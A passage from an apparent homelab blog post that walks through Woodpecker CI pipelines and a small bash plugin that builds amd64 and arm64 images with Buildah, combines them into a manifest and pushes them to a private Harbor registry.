</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build arm64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/buildah:0.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">buildah --root /woodpecker build --storage-driver=vfs --platform linux/arm64 -t testing:0.1 --build-arg alpine_ver=3.22.1 -f testing/Containerfile testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;arm64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">push image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/buildah:0.4</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">sleep 10000</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: [<span style="color:#e6db74">&#34;build amd64 image&#34;</span>, <span style="color:#e6db74">&#34;build arm64 image&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span></code></pre></div><p>With this configuration, the two builds for amd64 and arm64 are run in parallel,
and the final <code>push image</code> step would be responsible for combining the
images into a single manifest and pushing it all to my Harbor instance.</p>
<p>I ran a test build and then exec&rsquo;d into the Pod when the pipeline arrived at the
<code>push image</code> step. I used the following commands to combine the manifests
and push them up to Harbor:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest create harbor.example.com/homelab/testing:0.1
</span></span><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest add harbor.example.com/homelab/testing:0.1 3883d7a9067d
</span></span><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest add harbor.example.com/homelab/testing:0.1 0130169db3bb
</span></span><span style="display:flex;"><span>buildah login https://harbor.example.com
</span></span><span style="display:flex;"><span>buildah --root /woodpecker --storage-driver<span style="color:#f92672">=</span>vfs manifest push harbor.example.com/homelab/testing:0.1 docker://harbor.example.com/homelab/testing:0.1
</span></span></code></pre></div><p>The problematic thing about this approach was that I had no way of knowing the
correct values for the image names in the <code>manifest add</code> commands, where I used
the image hashes in this example. I could of course set separate names for the
image, e.g. with the platform in the name. But then I would have to remember to
do that every time I create a new pipeline.</p>
<p>Instead, I decided to go one step further and check how painful it would be
to turn my simple command-based steps into a Woodpecker plugin.</p>
<h2 id="building-a-woodpecker-plugin">Building a Woodpecker plugin</h2>
<p>And it turns out: It isn&rsquo;t complicated at all. The docs for <a href="https://woodpecker-ci.org/docs/usage/plugins/creating-plugins">new Woodpecker plugins</a>
are rather short and sweet. Plugins need to be containerized, and they need to have
their program set as the entrypoint in the image. And that&rsquo;s it. Any options given
in the step are forwarded to the step container via environment variables, so there&rsquo;s
nothing special to be done at all.</p>
<p>That was good news, as I was a bit afraid I would have to write some Go. But no,
just pure bash was enough.</p>
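<p>The plugin image itself is essentially the Buildah image from above, with the plugin
script copied in and set as the entrypoint. A rough sketch (the <code>plugin.sh</code> name
is just for illustration):</p>
<pre tabindex="0"><code>ARG alpine_ver
FROM alpine:$alpine_ver

RUN apk --no-cache update \
	&amp;&amp; apk --no-cache add buildah netavark iptables bash jq

COPY plugin.sh /usr/local/bin/plugin.sh
ENTRYPOINT [&#34;/usr/local/bin/plugin.sh&#34;]
</code></pre>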
<p>In its final form, my pipeline for the testing image looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;.woodpecker/testing.yaml&#39;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#e6db74">&#39;testing/*&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">variables</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;alpine-version</span> <span style="color:#e6db74">&#39;3.22.1&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;image-version</span> <span style="color:#e6db74">&#39;0.2&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#75715e">&amp;buildah-config</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">context</span>: <span style="color:#ae81ff">testing/</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">containerfile</span>: <span style="color:#ae81ff">testing/Containerfile</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">build_args</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">alpine_ver</span>: <span style="color:#75715e">*alpine-version</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build amd64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/woodpecker-plugin-buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*buildah-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">platform</span>: <span style="color:#ae81ff">linux/amd64</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;amd64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">build arm64 image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/woodpecker-plugin-buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">&lt;&lt;</span>: <span style="color:#75715e">*buildah-config</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">platform</span>: <span style="color:#ae81ff">linux/arm64</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: []
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">backend_options</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">kubernetes</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#e6db74">&#34;arm64&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">push image</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">harbor.example.com/homelab/woodpecker-plugin-buildah:latest</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">manifest_platforms</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;linux/arm64&#34;</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;linux/amd64&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">latest</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">1.5</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">repo</span>: <span style="color:#ae81ff">harbor.example.com/homelab/testing</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ci</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">container-registry</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">depends_on</span>: [<span style="color:#e6db74">&#34;build amd64 image&#34;</span>, <span style="color:#e6db74">&#34;build arm64 image&#34;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">privileged</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">evaluate</span>: <span style="color:#e6db74">&#39;CI_COMMIT_BRANCH != CI_REPO_DEFAULT_BRANCH&#39;</span>
</span></span></code></pre></div><p>When a Woodpecker plugin is launched, it gets all of the values under <code>settings:</code>
handed in as environment variables.
A normal key/value pair like <code>type: push</code> would appear as <code>PLUGIN_TYPE=&quot;push&quot;</code> in
the plugin&rsquo;s container.
Lists like the <code>tags</code> or <code>manifest_platforms</code> options appear as comma-separated values,
e.g. <code>PLUGIN_TAGS=&quot;latest,1.5&quot;</code>.
Objects are a bit more complicated; they&rsquo;re handed over as JSON, e.g.
<code>PLUGIN_BUILD_ARGS='{&quot;alpine_ver&quot;: &quot;3.22.1&quot;}'</code>.</p>
<p>First, there is a bit of a preamble in the script, to check whether required
config options have been set and Buildah is available:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>DATA_ROOT<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/woodpecker&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ! command -v buildah; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;buildah not found, exiting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;PLUGIN_TYPE not set, exiting.&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span></code></pre></div><p>Then, depending on the <code>PLUGIN_TYPE</code> variable, either the <code>build</code> or the <code>push</code>
function is executed, which either builds the image for a single platform or
combines multiple platforms into a single manifest and pushes it all to the
given registry:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;build&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Running build...&#34;</span>
</span></span><span style="display:flex;"><span>  build <span style="color:#f92672">||</span> exit $?
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">elif</span> <span style="color:#f92672">[[</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;push&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Running push...&#34;</span>
</span></span><span style="display:flex;"><span>  push <span style="color:#f92672">||</span> exit $?
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Unknown type </span><span style="color:#e6db74">${</span>PLUGIN_TYPE<span style="color:#e6db74">}</span><span style="color:#e6db74">, exiting&#34;</span>
</span></span><span style="display:flex;"><span>  exit <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>exit <span style="color:#ae81ff">0</span>
</span></span></code></pre></div><p>And here is the <code>build</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>build<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_CONTEXT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_CONTEXT not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_PLATFORM<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_PLATFORM not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_CONTAINERFILE<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_CONTAINERFILE not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -n <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_BUILD_ARGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    BUILD_ARGS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>get_build_args <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_BUILD_ARGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  command<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;buildah \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">--root </span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">build \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">--storage-driver=vfs \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">--platform </span><span style="color:#e6db74">${</span>PLUGIN_PLATFORM<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-t </span><span style="color:#e6db74">${</span>PLUGIN_PLATFORM<span style="color:#e6db74">}</span><span style="color:#e6db74">:0.0 \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span><span style="color:#e6db74">${</span>BUILD_ARGS<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">-f </span><span style="color:#e6db74">${</span>PLUGIN_CONTAINERFILE<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74"></span><span style="color:#e6db74">${</span>PLUGIN_CONTEXT<span style="color:#e6db74">}</span><span style="color:#e6db74"> \
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Running command: </span><span style="color:#e6db74">${</span>command<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#e6db74">${</span>command<span style="color:#e6db74">}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">return</span> $?
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>It again starts out with some checks to make sure the required variables are set.
Then it runs the <code>buildah build</code> command just like in the earlier manual
setup. The one &ldquo;special&rdquo; thing I&rsquo;m doing here is that I tag the new image with
the <code>PLUGIN_PLATFORM</code> variable and the <code>:0.0</code> version. The storage for the builders
is entirely temporary, so I will never have multiple versions in the storage,
and this allows me to make the names of the images predictable in the later
<code>push</code> step. So at the end of the function&rsquo;s run, I would have images <code>linux/amd64:0.0</code>
and <code>linux/arm64:0.0</code> in the same storage.</p>
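<p>I&rsquo;m glossing over the <code>get_build_args</code> helper here: it&rsquo;s a small bit of
<code>jq</code> that turns the <code>PLUGIN_BUILD_ARGS</code> JSON into <code>--build-arg</code>
flags. A rough sketch of the idea, not the verbatim helper:</p>
<pre tabindex="0"><code>get_build_args() {
  # Sketch: turn &#39;{&#34;alpine_ver&#34;: &#34;3.22.1&#34;}&#39; into &#39; --build-arg alpine_ver=3.22.1&#39;
  local json=&#34;$1&#34;
  local args=&#34;&#34;

  for key in $(echo &#34;${json}&#34; | jq -r &#39;keys[]&#39;); do
    local val
    val=$(echo &#34;${json}&#34; | jq -r --arg k &#34;${key}&#34; &#39;.[$k]&#39;)
    args=&#34;${args} --build-arg ${key}=${val}&#34;
  done

  echo &#34;${args}&#34;
}
</code></pre>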
<p>Which then brings us to the <code>push</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>push<span style="color:#f92672">()</span> <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_REPO not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TAGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_TAGS not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    TAGS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_TAGS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | tr <span style="color:#e6db74">&#39;,&#39;</span> <span style="color:#e6db74">&#39; &#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_MANIFEST_PLATFORMS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_MANIFEST_PLATFORMS not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>    PLATFORMS<span style="color:#f92672">=</span><span style="color:#66d9ef">$(</span>echo <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_MANIFEST_PLATFORMS<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> | tr <span style="color:#e6db74">&#39;,&#39;</span> <span style="color:#e6db74">&#39; &#39;</span><span style="color:#66d9ef">)</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_USERNAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_USERNAME not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">if</span> <span style="color:#f92672">[[</span> -z <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;PLUGIN_PASSWORD not set, aborting.&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Logging in...&#34;</span>
</span></span><span style="display:flex;"><span>  buildah login -p <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_PASSWORD<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> -u <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_USERNAME<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Creating manifest...&#34;</span>
</span></span><span style="display:flex;"><span>  buildah --root <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> --storage-driver<span style="color:#f92672">=</span>vfs manifest create newimage <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">for</span> plt in <span style="color:#e6db74">${</span>PLATFORMS<span style="color:#e6db74">}</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>    echo <span style="color:#e6db74">&#34;Adding platform </span><span style="color:#e6db74">${</span>plt<span style="color:#e6db74">}</span><span style="color:#e6db74">...&#34;</span>
</span></span><span style="display:flex;"><span>    buildah --root <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> --storage-driver<span style="color:#f92672">=</span>vfs manifest add newimage <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>plt<span style="color:#e6db74">}</span><span style="color:#e6db74">:0.0&#34;</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  echo <span style="color:#e6db74">&#34;Pushing to registry...&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">for</span> tag in <span style="color:#e6db74">${</span>TAGS<span style="color:#e6db74">}</span>; <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>    buildah --root <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>DATA_ROOT<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span> --storage-driver<span style="color:#f92672">=</span>vfs manifest push newimage docker://<span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span>:<span style="color:#e6db74">${</span>tag<span style="color:#e6db74">}</span> <span style="color:#f92672">||</span> <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  buildah logout <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">${</span>PLUGIN_REPO<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>
